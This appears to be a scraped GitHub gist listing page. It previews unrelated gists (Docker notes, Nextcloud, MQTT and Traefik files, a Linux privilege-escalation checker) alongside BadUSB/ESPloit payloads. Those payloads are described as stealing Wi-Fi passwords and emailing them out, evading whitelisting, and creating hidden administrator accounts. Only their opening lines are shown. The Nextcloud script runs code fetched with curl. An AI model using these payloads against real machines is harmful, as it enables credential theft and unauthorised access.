To install a custom package or modify an existing docker image we need to
- run a docker a container from the image we wish to modify
- modify the docker container
- commit the changes to the container as a docker image
- test changes made to image
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # ------ Format ------ | |
| # Commit body | |
| # ------ Rules ------ | |
| # 1. Do not use emoji on the commit message | |
| # 2. End the commit message with a period | |
| # 3. Capitalize the commit message | |
| # 4. Wrap the commit message at 60 characters | |
| # ------ Example ------ |
YourFriendCaspian
/ payload_data_exfiltration_backdoor.txt
Last active
December 8, 2019 19:11
This simple script will grab all of the wifi passwords, external IP address, LAN address, and hostname of the target device and e-mail it to an address of your choice. I recommend you use a Gmail address for this. I have not had luck with Yahoo, Hotmail, etc... It then creates a user called Microsoft, and shares C:\ out to the new user. My goal …
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| REM:*************************************************** | |
| Rem:# Backdoor - Data Exfiltration | |
| Rem:# Credit goes to Crumb93 and BrainEater from the Hak5 forums for the Wifi Password one liner | |
| REM:This simple script will grab all of the wifi passwords, external IP address, LAN address, | |
| REM:and hostname of the target device and e-mail it to an address of your choice. | |
| REM:I recommend you use a Gmail address for this. I have not had luck with Yahoo, Hotmail, etc... | |
| REM:It then creates a user called Microsoft, and shares C:\ out to the new user. | |
| REM:My goal here was to use one liners to prevent this from being picked up by whitelisting | |
| REM:applications (no .bat, .exe, etc...) | |
| REM:*************************************************** |
YourFriendCaspian
/ Payload_utilman_exploit.txt
Created
December 8, 2019 19:04
Utilman Exploiter to create a new Admin Account
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Rem:Author: Xcellerator (props to Jay Kruer's Fork Bomb script for the UAC bypass technique!) | |
| Rem:Duckencoder: 1.0 | |
| Rem:Target: Windows 7 | |
| Rem:Description: Uses the Utilman.exe Exploit to create a new local administrator account “Local000” REM with the password “hak5”. | |
| Rem:Author: Xcellerator | |
| Rem:Description: Utilman Exploiter to create a new Admin Account | |
| Rem:The new account will be called "Local000". | |
| Press:131 | |
| CustomDelay:50 | |
| Print:cmd |
YourFriendCaspian
/ data_exfiltration_backdoor.txt
Last active
September 21, 2019 20:47
This simple script will grab all of the wifi passwords, external IP address, LAN address, and hostname of the target device and e-mail it to an address of your choice. I recommend you use a Gmail address for this. I have not had luck with Yahoo, Hotmail, etc... It then creates a user called Microsoft, and shares C:\ out to the new user. My goal …
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Rem:Generated by Dckuino.js by NURRL | |
| Rem:Modified for use with ESPloit by Corey Harding | |
| Rem:----- | |
| Rem:# Backdoor - Data Exfiltration | |
| Rem:# Credit goes to Crumb93 and BrainEater from the Hak5 forums for the Wifi Password one liner | |
| CustomDelay:1000 | |
| Press:131+100 | |
| CustomDelay:450 | |
| Press:131+114 | |
| CustomDelay:450 |
YourFriendCaspian
/ win10_add_admin.txt
Last active
July 4, 2022 11:43
Exploit to create a new local administrator account ADMIN with the password admin. Hide user from user settings and from login screen.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Rem:Generated by Dckuino.js by NURRL | |
| Rem:Modified for use with ESPloit by Corey Harding | |
| Rem:----- | |
| Rem:Start delay | |
| CustomDelay:1000 | |
| CustomDelay:300 | |
| Press:131+114 | |
| CustomDelay:300 | |
| Print:powershell Start-Process cmd -Verb runAs | |
| CustomDelay:300 |
YourFriendCaspian
/ linuxprivchecker.py
Created
July 28, 2019 04:23
a Linux Privilege Escalation Check Script
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/env python | |
| ############################################################################################################### | |
| ## [Title]: linuxprivchecker.py -- a Linux Privilege Escalation Check Script | |
| ## [Author]: Mike Czumak (T_v3rn1x) -- @SecuritySift | |
| ##------------------------------------------------------------------------------------------------------------- | |
| ## [Details]: | |
| ## This script is intended to be executed locally on a Linux box to enumerate basic system info and | |
| ## search for common privilege escalation vectors such as world writable files, misconfigurations, clear-text | |
| ## passwords and applicable exploits. |
YourFriendCaspian
/ nextcloud_talk.sh
Created
July 27, 2019 13:14
Install Talk plugin and TURN Server in Nextcloud
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # T&M Hansson IT AB © - 2019, https://www.hanssonit.se/ | |
| # shellcheck disable=2034,2059 | |
| true | |
| # shellcheck source=lib.sh | |
| NC_UPDATE=1 && TURN_INSTALL=1 . <(curl -sL https://raw.githubusercontent.com/nextcloud/vm/master/lib.sh) | |
| unset NC_UPDATE | |
| unset TURN_INSTALL |
YourFriendCaspian
/ modify-docker-image.md
Created
July 26, 2019 06:45
— forked from glamp/modify-docker-image.md
YourFriendCaspian
/ mqtt_dht_sensor.py
Created
July 20, 2019 23:36
DHT Sensor Data-logging to MQTT Temperature channel
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| # DHT Sensor Data-logging to MQTT Temperature channel | |
| # Requies a Mosquitto Server Install On the destination. | |
| # Copyright (c) 2014 Adafruit Industries | |
| # Author: Tony DiCola | |
| # MQTT Encahncements: David Cole (2016) | |
| # Permission is hereby granted, free of charge, to any person obtaining a copy |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| [backends] | |
| [backends.hassio] | |
| [backends.hassio.servers.nuc] | |
| url = "http://YOUR-HASSIO-LOCAL-IP:8123" | |
| [frontends] | |
| [frontends.hassio] | |
| backend = "hassio" | |
| [frontends.hassio.routes.hassio] | |
| rule = "Host:hassio.yourdomain.com" |